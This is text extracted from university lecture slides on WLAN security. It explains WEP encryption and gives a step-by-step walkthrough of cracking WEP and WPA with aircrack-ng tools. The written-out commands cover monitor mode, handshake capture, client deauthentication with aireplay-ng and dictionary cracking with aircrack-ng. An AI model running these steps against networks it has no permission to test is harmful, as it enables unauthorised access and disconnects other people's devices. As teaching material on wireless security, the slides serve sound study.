1
WLAN Security: Cracking WEP/WPA
รศ. ดร. อนันต์ ผลเพิม่
Assoc. Prof. Anan Phonphoem, Ph.D. [email protected]
http://www.cpe.ku.ac.th/~anan
Computer Engineering Department
Kasetsart University, Bangkok, Thailand
Wireless LANs
WEP Block Diagram
2
WEP Frame
Integrity Algorithm (CRC-32)
Pseudo-Random Number Generator
RC-4
+
Bitwise XOR
Plain Text
Cipher Text
Integrity Check Value (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
Initialization Vector (IV)
IV
Encryption Block
Sender Site
Integrity Algorithm
Pseudo-Random Number Generator
Bitwise XOR
Cipher Text
Plain Text
Integrity Check Value (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
Decryption Block
Receiver Site
3
WEP – Encoding
Integrity Algorithm (CRC-32)
Pseudo-Random Number Generator
RC-4
+
Bitwise XOR
Plain Text
Cipher Text
Integrity Check Value (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
Initialization Vector (IV)
IV
4
WEP Frame
Frame Header
IV Header
Frame Body ICV
Trailer FCS
Encrypted Clear Text Clear Text
4 bytes 4 bytes
5
WEP – Decryption
Integrity Algorithm
Pseudo-Random Number Generator
Bitwise XOR
Cipher Text
Plain Text
Integrity Check Value (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
Cracking WEP
6
7
Cracking Steps
1) Reconnaissance (Collect target info.) [kismet]
2) Run promiscuous mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]
8
Default SSIDs
9
1) Reconnaissance (Collect target info.)
10
Kismet (Reconnaissance)
11
Kismet (AP Info.)
12
Kismet (Client Info.)
13
2) Run promiscuous mode
14
1 2
3 4
Regular Behavior
Station 1 transmits to all (broadcast)
15
1 2
3 4
Intention to Eavesdrop
Promiscuous
mode
Station 1 transmits to station 4
16
iwconfig
iwlist
17
Promiscuous Mode Setup
• By using iwconfig
18
Promiscuous Mode Setup
• By using airmon-ng
19
Promiscuous Mode Setup
20
21
3) Collect data
22
airodump
From Kismet
Airodump problem
root@APMoose:~/toulouse# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”
anan@APMoose:~$ rfkill list
0: phy0: Wireless LAN
Soft blocked: no software can reactivate
Hard blocked: no software cannot reactivate
1: acer-wireless: Wireless LAN
Soft blocked: no
Hard blocked: no
2: acer-bluetooth: Bluetooth
Soft blocked: no
Hard blocked: no
4: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
Solve by:
root@APMoose:~/toulouse# rfkill unblock all
23
24
airodump
25
airodump data files
26
4) Crack Key
aircrack
• For non-encryption
27
28
aircrack
29
WEP Cracking Demo
Cracking WPA
30
Cracking Steps
1)Start the wireless interface in monitor mode on the specific AP channel
2)Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
3)Use aireplay-ng to deauthenticate the wireless client
4)Run aircrack-ng to crack the pre-shared key using the authentication handshake
31 http://www.aircrack-ng.org/doku.php?id=cracking_wpa
32
1) Start Monitoring Mode
Check interface
33
iwconfig
34
Start monitoring mode
35
36
2) Start airodump-ng collect authentication handshake
Start airodump-ng
37
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter Description
-c 6 Wireless channel
--bssid 00:1E:F7:xx:xx:xx AP’s MAC
-w psk File name prefix (contain Ivs)
mon0 Interface name
Start airodump-ng less parameter
38
Moose# airodump-ng -w psk mon0
39
3) Deauthenticate client
aireplay
40
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter Description
-0 deauthentication
1 # deauthentication sent
-a 00:12:01:xx:xx:xx AP’s MAC
-c 00:23:11:xx:xx:xx Deauthing client’s MAC-
mon0 Interface name
41
4) Crack
Need a dictionary
42
Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap
With dictionary
43
Moose# aircrack-ng -w password.lst -psk*.cap
Handshake found
44 http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Successfully Crack
45 http://www.aircrack-ng.org/doku.php?id=cracking_wpa